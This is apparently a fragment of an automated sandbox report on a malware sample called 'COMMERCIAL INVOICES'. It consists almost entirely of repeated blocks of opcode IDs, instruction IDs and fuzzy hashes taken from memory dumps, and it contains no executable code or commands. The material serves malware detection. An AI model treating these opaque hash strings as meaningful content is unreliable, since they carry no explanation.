• API String ID:
• Opcode ID: 83bda1ef21544a3cfcc0f6eb202ba75b23a0cd093d65d6c679b98df77c95212b
• Instruction ID: 810c1321ed2996936826cdd331afea2fa4f4860c1ca5cfe3f790ccae962c9bdf
• Opcode Fuzzy Hash: 83bda1ef21544a3cfcc0f6eb202ba75b23a0cd093d65d6c679b98df77c95212b
• Instruction Fuzzy Hash: A411B6767306169BDB1DCF8DC480A26BBE5AF4A750B15406DEF089F204D6B1D901C790
Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 5206183d9c3d3028ce46e1d57ec8a33f9b41d88edece536407be15a7d09ba192
• Instruction ID: 6894549112737ba51704110f0a7c1110aaf34b9f107f7f24cd7cd14f943eb222
• Opcode Fuzzy Hash: 5206183d9c3d3028ce46e1d57ec8a33f9b41d88edece536407be15a7d09ba192
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F216F75A20206DFCB19CF98C581A6EBBF5FB88714F24416ED609A7311C771AD46CBD0
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 595209a1c86467d5d9d86248adf3a105280fef90e6409e4e2d6ddd40a01388ab
                                                                                                                                                                                                                                      • Instruction ID: 5bc79fcb9ece85bb4df221caa96a7ffe692fc145d65bd953f9d5c4c3a03bc381
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 595209a1c86467d5d9d86248adf3a105280fef90e6409e4e2d6ddd40a01388ab
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 92218C75620A01EFE7249F68C881B67B7E8FF84390F44882DE59AC7251DA71A850CB64
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 1dfde1f69e9a4c382caf98371767619e56474e4ef123ed771e4de5693ccb9c37
                                                                                                                                                                                                                                      • Instruction ID: 6ce8cc76e17d2572bf07820a6c4fbae3c0bba19bb44c2dde0a1068489aa500e5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1dfde1f69e9a4c382caf98371767619e56474e4ef123ed771e4de5693ccb9c37
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2011C632260615EFC722DF6DCD41FDA77A8EF99750F114025F605DB251DA70E905C790
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: aee3811e8eb4c6b8fb8139ec8bdffa1924a60726c44b80dc7f6d1034794119bb
                                                                                                                                                                                                                                      • Instruction ID: 93c468243d7cde831be285b6cf31c7b86b4d033593227a5474b90685f0da713d
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: aee3811e8eb4c6b8fb8139ec8bdffa1924a60726c44b80dc7f6d1034794119bb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 34116F773201519FCB1ADB29CD81A3F725BDFD5374B65452DD922CB281E9308802C794
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 68defc80a507c141efaf0127ba34c72a653bfda43cf1c33d2841886f8addfe29
                                                                                                                                                                                                                                      • Instruction ID: cb06a898d6a20251e498ba5c15c5696e9a3098700a18aad1abd8550cfa4a3787
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 68defc80a507c141efaf0127ba34c72a653bfda43cf1c33d2841886f8addfe29
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B611E3B6A21646EFDB29CF59C581A5BFBF8EF84790F154079DA059B310E670DD00CB90
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                                                                                                                                                      • Instruction ID: 437f06084fc61162ff451fb7b86ad80afb4ab5232233a1020211b0c5e880e2eb
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4aa21802b203594a0c183a0f29eab8f59a86752156d6c183eb3a1b7e63dba1b2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E11E636A00509AFDB19CB58C811B9EF7F5EF84214F054269E84597380D631AD41CB80
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                                                                                                                                                      • Instruction ID: 472c903adcb198a9c5bfd700d991def7922ae9aece201d9c3e62f794363374dc
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: be7cdff5b472ac4535dea4ef4a70d93a0a3acfb449cd7ab0a5074af29ebfca6c
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9011BF31621602EBEB259B48C841B6B7FA6EB45B54F06872CEB089B260D770DC40DB90
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 612a09ba85fd7c68fad684428af5964db532d4d0bd9cc8930965dc6e38a7068b
                                                                                                                                                                                                                                      • Instruction ID: ea72a1ad94c0ba129ad2ec9bdbae14514d0e8fda3be3cf3083eeda75939af4c5
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 612a09ba85fd7c68fad684428af5964db532d4d0bd9cc8930965dc6e38a7068b
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 1D012231236646AFF326A26EDC88F377B9CFF80794F450065FA018B290DA64DC00C2B1
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 2cca9a8c1adf7e813c0dc1edbd53f6d841fa0ff8755d8a556873e25d4af02a82
                                                                                                                                                                                                                                      • Instruction ID: 853cd85bbfb43e8c055990672ce3df03a6792edf715e08e48eae94a076c5e769
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2cca9a8c1adf7e813c0dc1edbd53f6d841fa0ff8755d8a556873e25d4af02a82
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4811E536261686AFDB2EEF5DD841F567BA8EB96764F004119FA048B350C370F851CF60
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0301F532220102CBDF199A1EE880BA27BA6BFE4700F1550A5FE01CF246DAB1C881C390
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 559a0270b2bc01a644cb7579890e1a1f88657e67b55924eb29530bd3fe7f2aa5
                                                                                                                                                                                                                                      • Instruction ID: 5d587a1855960b980b925cb38f5052085f10f6bb9ac55e61ac4ad08f41cfc661
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 559a0270b2bc01a644cb7579890e1a1f88657e67b55924eb29530bd3fe7f2aa5
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 701104326101469FC311CF58E800BA6BBB9FF5A304F488159E948CB315D732EC80CBA0
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 34297a021da1dfbe10de3f95b1cbbc7caf8adb8b7b30dc0ba3d4bea8fe8f2e13
                                                                                                                                                                                                                                      • Instruction ID: 06066e47c905cf351b2aba94e55ac469a511f2bc27a024c850667ae4668b3268
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 34297a021da1dfbe10de3f95b1cbbc7caf8adb8b7b30dc0ba3d4bea8fe8f2e13
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 981118B1A1120A9BCB00DFA9D581AAEBBF8FF58750F10406AB905E7351D674EA018BA4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: f8b8000a506e6d0973383f8b8718a0bf5019b0114bbbd6476eb15eb3b167fc27
                                                                                                                                                                                                                                      • Instruction ID: c632262e6f9d97b9fabe168ff077168243f52503ea09ae33a4f79d1a95f2b332
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f8b8000a506e6d0973383f8b8718a0bf5019b0114bbbd6476eb15eb3b167fc27
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A901F131060212DBC732AE19848897ABBE9FF92694B86842EE6021B340CB319C41CB91
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                                                                                                                                      • Instruction ID: fda250cbb6245d64a0cc573474d2ed3044ee90f3dc2a11b8496ef029f794ce21
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3701DD7222074A9FDF22D66ED440F77B7E9FFC5654F04441AE69687540DE70E441C750
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: dc75ea870bd8e2e94c0416522dac3a6872be51f8340c299e852986c9a8fd7d33
                                                                                                                                                                                                                                      • Instruction ID: 783d95827cdf7df7330d7a5bb4e01af9cf6fcbfa75d4f4b1e698882fcaf1aa05
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dc75ea870bd8e2e94c0416522dac3a6872be51f8340c299e852986c9a8fd7d33
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FD116D75A2224EEBCB05EFA4C851FAE7BB9FB44780F104059FA0597290E635EE11CB90
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: f2c87c4a098f2a34cb83f2fd6aa5656c03320068f0a45c38c8f1e39b011ee6e2
                                                                                                                                                                                                                                      • Instruction ID: f541186f00586ebb2af5b237c072a8c78c750de90fd7e06c8648bbe2636677b2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: f2c87c4a098f2a34cb83f2fd6aa5656c03320068f0a45c38c8f1e39b011ee6e2
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9A01D4B1220502FFC751AB29CDC0E63BBACFB997947000525F60587590DB34EC41C6A0
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 86dee36e04ba9c3e0df1ec518758aa0cde7bf227105f0e1d92feca2dbbd89437
                                                                                                                                                                                                                                      • Instruction ID: c0c680dd0dadc2b9995792c42b3a91d5798fc0fc132d83787579e728a50086dd
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 86dee36e04ba9c3e0df1ec518758aa0cde7bf227105f0e1d92feca2dbbd89437
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0401D8322352129BC320EF69C8899A6BBA8FF58660F214129F999871C0E734D905C7D2
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 4a7e60a65f0bc87eaa6d49681967b1dbd3ee23a78bf96aec0cc0278ca75d9a0f
                                                                                                                                                                                                                                      • Instruction ID: 89973c2887cc5117f1a6c4dbdd437d4200640dd6908ed40cfe97bca018c937a3
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4a7e60a65f0bc87eaa6d49681967b1dbd3ee23a78bf96aec0cc0278ca75d9a0f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9C116175A1124DEBDB15EF64C851EBEBBB5FB48750F008159FE0597380DA34D911CB90
Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 36b5fa13ae0248c6fc079ce98dde58d7003dcb75e347cd4443c0a41a0759c5ca
• Instruction ID: 0e6bdbb05e66a2ffa869041d0c7b7fe3dc780ef40abf58ea7381c14dec762690
• Opcode Fuzzy Hash: 36b5fa13ae0248c6fc079ce98dde58d7003dcb75e347cd4443c0a41a0759c5ca
• Instruction Fuzzy Hash: DD117CB16153459FC700DF69C44299BBBE8FF98710F00451EBA98D7390E630E900CB96
                                                                                                                                                                                                                                      • Instruction ID: 56f444a0e60a76343de7ff3393f61e9cf5c8e52b9f1851f0c53a5be99345a2c6
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 99b645b85c0ce414d332d533fd577958487de48897950a5f6e1b17e731e8e204
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C0017CB1A1020AABCB04DFA9D441AAEBBF8FF58304F50402AF901E7390D674DA018BA4
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                                                                                                                                                      • Instruction ID: feb2a3ad86fb2254a32c16dafa242e130124e0b172e2e2f934ab0987c4e456a4
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: AE01D6312206879FD7269A2DC845BAABBECFF51790F0840A5FB088B691D678C810C250
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: c05f76c1ee5b492477deb246655e9d81c390279a568a502e9a181d2b9be85feb
                                                                                                                                                                                                                                      • Instruction ID: a76c40f472f316338c58a109fcfb019da0544cebe5f2fb34e7af3c76d75b4d7b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: c05f76c1ee5b492477deb246655e9d81c390279a568a502e9a181d2b9be85feb
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 75018F71A112499BCB04EFA9D441AEEBBF8BF58314F14005AF901A7280D774EA02CB98
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                                                                                                                      • Instruction ID: 7a0e617f5f66a7fbb4823ea3449c9a85360557944ece9ea67975a73ab674fbc0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FFF01D7221005DBFEF019F94DD80DBF7B7EFB596D8B104229FA11A2160D631DD21ABA0
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 7ba28718038fdc53c9136c8cc6f3a60b6d72a8b841dd46b9cb1c00447ec8cf85
                                                                                                                                                                                                                                      • Instruction ID: d310d60d967d1d83f5783169a94aa88adbe8085f0d0c6641fc4873c27b09c3fe
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7ba28718038fdc53c9136c8cc6f3a60b6d72a8b841dd46b9cb1c00447ec8cf85
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F701893651014DABCF129E84D840EDA7F66FB4C794F058205FE1866220C332D971EB81
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 74b47afe616c2d5111f46d814948960ffab9be55c55e65b1db212a561a63f425
                                                                                                                                                                                                                                      • Instruction ID: f556f8edcc64db4a7d1aa9e7d6e2c721677c62ca994161858e9049dbb7efc5a0
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 74b47afe616c2d5111f46d814948960ffab9be55c55e65b1db212a561a63f425
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 22F024B23342426BF7149619AC02F3233DAEBD0650F65802BEB459B2C5E9B0DC118394
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 23e0daac101fef5fbada601ab49c64006f8dcd86ea5e5a51849e47842eaabaf1
                                                                                                                                                                                                                                      • Instruction ID: 9e787806cac20a97048841a0feb18181f12d42fb75c2070d04867b4eebadcbd2
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 23e0daac101fef5fbada601ab49c64006f8dcd86ea5e5a51849e47842eaabaf1
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E201A470622AC3DFF332AB2CDD89B7637A8BB40B84F584190BB028B6D6D778D401C614
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                                                                                                                      • Instruction ID: a2edb30b06d739c3ddcd020d13e42d6d673996d20fbdccbdafba009fd1c1f8bf
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 49F0E93537199347EB76BF2D8414B7EA7D59F90940B65052C9741CB680DF60D84087A0
                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                      • Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                      • Snapshot File: hcaresult_4_2_1210000_COMMERCIAL INVOICES.jbxd
                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                      • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                                                                                                                                                                      • Instruction ID: a7cf1009900333f5fa26db4b450a0747afb4661c1776a75085bb97a93304e85b
                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
• Instruction Fuzzy Hash: CEF030326615129BD3219A4DCC80F17BB68EF95E60F5A0369AB049B270C660EC018790
Memory Dump Source
• Source File: 00000004.00000002.2544254617.0000000001210000.00000040.00001000.00020000.00000000.sdmp, Offset: 01210000, based on PE: true
